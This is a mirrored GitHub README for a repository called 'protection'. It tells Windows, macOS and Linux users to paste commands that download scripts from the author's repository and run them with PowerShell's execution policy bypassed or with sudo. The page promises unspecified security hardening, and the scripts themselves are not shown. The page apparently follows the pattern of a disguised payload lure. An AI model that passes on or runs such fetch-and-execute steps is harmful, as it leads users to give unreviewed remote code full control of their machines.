Code Monkey home page Code Monkey logo

protection's Introduction

Click your operating system to optimize security

Windows Logo macOS Logo Linux Logo


✓ Enables Firewall

✓ Blocks unauthorized access

✓ Reduces attack surface by disabling unused services

✓ Applies security settings

✓ Enhances overall system stability and performance

✓ Prevents common security vulnerabilities


Windows

This requires you to have at least 200 MB of free space available.

  1. Open Command Prompt
    • Press Windows + R
    • Type cmd
    • Press Enter
  2. Download Git Installer
    • Copy and paste the following command into Command Prompt to download the Git installer:
    • powershell -Command "Invoke-WebRequest -Uri https://github.com/git-for-windows/git/releases/latest/download/Git-64-bit.exe -OutFile Git-64-bit.exe"
  3. Install Git
    • Once downloaded, copy and paste the following command into Command Prompt to silently install Git:
    • .\Git-64-bit.exe /VERYSILENT /NORESTART
  4. Install Protection
    • Copy and paste the following command into Command Prompt to download the protection script:
    • curl -o win.ps1 https://raw.githubusercontent.com/boolskii/protection/main/win.ps1
  5. Run Protection
    • Copy and paste the following command into Command Prompt to run the protection script:
    • powershell -ExecutionPolicy Bypass -File .\win.ps1

Your PC is now protected from unwanted activity.


MacOS

This requires you to have at least 100 MB of free space available.

  1. Open Terminal
    • Press Command + Space
    • Type Terminal
    • Press Enter
  2. Install Homebrew
    • Copy and paste the following command into Terminal to install Homebrew:
    • /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"
  3. Install Git
    • Copy and paste the following command into Terminal to install Git via Homebrew:
    • brew install git
  4. Install Protection
    • Copy and paste the following command into Terminal to download the protection script:
    • curl -o mac.sh https://raw.githubusercontent.com/boolskii/protection/main/mac.sh
  5. Run Protection
    • Copy and paste the following command into Terminal to run the protection script:
    • sudo bash ./mac.sh

Your Mac is now protected from unwanted activity.


Linux

This requires you to have at least 100 MB of free space available.

  1. Open Terminal
    • Press Ctrl + Alt + T
  2. Update Package Lists
    • Copy and paste the following command into Terminal to update package lists:
    • sudo apt-get update
  3. Install Git
    • Copy and paste the following command into Terminal to install Git:
    • sudo apt-get install git -y
  4. Install Protection
    • Copy and paste the following command into Terminal to download the protection script:
    • curl -o lin.sh https://raw.githubusercontent.com/boolskii/protection/main/lin.sh
  5. Run Protection
    • Copy and paste the following command into Terminal to run the protection script:
    • sudo bash ./lin.sh

Your system is now protected from unwanted activity.

protection's People

Contributors

boolskii avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.